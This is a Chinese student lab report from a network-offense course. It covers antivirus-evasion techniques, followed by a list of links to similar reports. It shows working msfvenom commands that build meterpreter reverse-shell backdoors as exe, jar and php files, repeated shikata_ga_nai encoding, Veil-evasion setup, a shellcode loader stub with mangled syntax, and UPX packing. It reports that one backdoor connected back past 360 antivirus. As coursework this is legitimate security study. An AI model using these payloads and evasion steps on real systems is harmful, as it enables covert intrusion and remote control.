2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践
实践内容(3.5分)
1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)
(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)
1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
2.
基础问题回答
(1)杀软是如何检测出恶意代码的?
检测特征码、启发式恶意软件检查和行为。
(2)免杀是做什么?
通过一些手段伪装使恶意代码免遭杀软查杀。
(3)免杀的基本方法有哪些?
有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法或者更高级的特征码修改包括文件特征码修改和内存特征码修改。
实验过程
任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
1、使用msf编码器
使用命令生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe
将生成的程序上传到virus total
检测
上传virscan
检测
使用msf编码器对后门程序编码10次
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe
然后再传到virus total
上检测
上传virscan
检测
2、使用msfvenom生成jar
使用命令生成.jar包
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar
上传virscan
检测
3、使用msfvenom生成php
使用命令生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php
上传virscan
检测
(居然只有一个检测出来了,是谁呢?)
(卡巴斯基,牛皮!乌拉!!!(破音!))
4、使用veil-evasion
安装这个veil真的是,遇到提示别选Y手动安装,直接s(silent)
静默安装,系统决定,一切随缘,手动安装的下场就是这样( ⬜ ⬜ ⬜? ⬜ ⬜。 ⬜ ⬜ ⬜!)
如果安装失败的,可以去usr/share/veil/config
下运行setup.sh
重新安装
最后安装成功的输入veil
会有如下界面,然后输入use evasion
进入evil-evasion
输入命令use c/meterpreter/rev_tcp.py
进入配置界面
set LHOST 192.168.70.131
set LPORT 5231
options
输入generate
生成文件,接着输入你想要playload的名字
然后文件保存在/var/lib/veil/output/compiled/
下,将生成文件提交扫描
任务二:Linux平台交叉编译Windows应用
5、利用shellcode编程
先执行shellcode生成命令得到shellcode
然后创建个.c文件将shellcode代码注入
“shellcode”
int main()
{
int (func)() = (int()())buf;
func();
}
执行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe
生成可执行的后门程序
然后上传测一下
然后拖到主机上测试,被检测出禁止运行并且Windows defender自动清理掉了(我的电脑早在三年前就卸载了360,电脑管家之类的,三年来的苟活凭借的就是一身正气加上微软自带的Windows Defender,我觉得那些东西不会让我电脑比这个更安全只会让它更卡!!!)
6.加壳测试
使用c+shellcode+加压缩壳
实验环境:被控机是win10实体机,没有360和腾讯电脑管家,微软自带Windows defender防火墙杀毒全开。
原理:将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果
使用压缩壳(UPX)upx 20165231.exe -o wyhy5231.exe
然后放到主机测试
放着不动或者用杀毒工具扫描就没有报警,一旦运行直接警告,并且直接被删
好的我错了,我以为就这么通过了没几分钟它就不见了!!!???系统又悄悄启动扫描一遍然后偷偷把文件给删了,然后再次放进主机共享文件夹就有危险报警了
为了完成反弹回连给他白名单吧,但是………………
好吧只有整个文件夹给设置为白名单吧(其实并没啥用,还是会被删,然后去威胁详细表里面手动恢复)
最后按照上次实验的步骤,我还是控制了我的win10主机,并且拍了个照,Windows defender也没有再干预。
任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
免杀方法:先用msfvenom生成shellcode,再使用压缩壳进行加壳。
实验环境:对方电脑为 win7实体机,360 11.5.0.2002
本机打开msf控制台,开始监听,受控机运行后门程序
开启杀软能绝对防止电脑中恶意代码吗?
不能,此次简单的实验都逃过一劫(虽然有些地方暂时启用了白名单),高手总会想办法模拟一些正常软件的特征然后不断加壳加密或者更加高级的手段逃过杀软的查杀。
实验中遇到的问题
1、安装veil-evasion过程中出现很多弹窗提示你安装,但是里面的字却又是方框,编码错误显示不出来。
解决:在安装之除就选择s
静默安装,一切由系统自己设置安排。
2、虚拟机ping不通别的实体机
解决:把虚拟机网卡设置改为桥接模式就可以了
实验感想
本次实验很长,很不好做,特别是veil,安装时间长,出错排查困难。经过这次实验我也认识到杀软也不是万能的,总会有病毒库里没出现过的新鲜玩意逃过一劫。想要电脑的安全就要做到自己不主动浏览不安全网站,不去下载不明软件,再加上杀软的一些防火墙功能,对于我们普通人来说还是很安全的。其次身边同学的实验也让我感受到360 和安全管家真是越来越** 了,好好一台电脑装了这玩意儿就卡卡卡死了!
转载于:https://www.cnblogs.com/Yhooyon/p/10623110.html
2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践相关推荐
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
- 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
<网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...
- 2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践 免杀的概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-Ant ...
- 20165223《网络对抗技术》Exp3 免杀原理与实践
目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shel ...
- 2018-2019-2 网络对抗技术 20165303 Exp3 免杀原理与实践
实验内容 一. 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) ...
- 20164317《网络对抗技术》Exp3 免杀原理与实践
一.实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程( ...
- 2018-2019-2 网络对抗技术 20165335 Exp3 免杀原理与实践
一.免杀原理与基础知识: (1)杀软是如何检测出恶意代码的? 检测特征码:特征码就是一般程序都不会有的代码,而后门有的那种特别的数据,而一个程序,应用有这种代码,数据的话,就直接判定为恶意代码. 主流 ...
最新文章
- 什么业务场景适合使用Redis?
- 词法分析(4)---NFA与DFA的转化
- 什么是 SAP Commerce yForms
- 【公共类库】加密解密
- C++/C--二分查找之lower_bound( )和upper_bound( )【转载】
- 这可能是目前最好的图像超分辨率算法,刚刚开源了
- 二分- Count on Canton
- android点击获得坐标,android点击MapView任意一点获得坐标
- html th表格居中,HTML----之表格
- 实验二 软件工程个人项目
- linux如何压缩磁盘,Linux初级运维(十二)——磁盘及文件系统管理
- DOM Element对象 参考手册
- 清华大学计算机红皮书,哈佛的红皮书_82702698.pdf
- 《程序员自我修养》阅读笔记-可执行文件装载与进程
- JDBC04 PreparedStatement
- java魔兽争霸_GitHub - mzhg/jw3gparser: Java解析《魔兽争霸3》游戏录像工具
- python 分词 词性_pyhanlp——分词与词性标注
- python的spider程序下载_Python Spider
- java如何叠加图片_图片叠加效果Java代码实现
- WPSOffice双面文档打印边距设置技巧(转)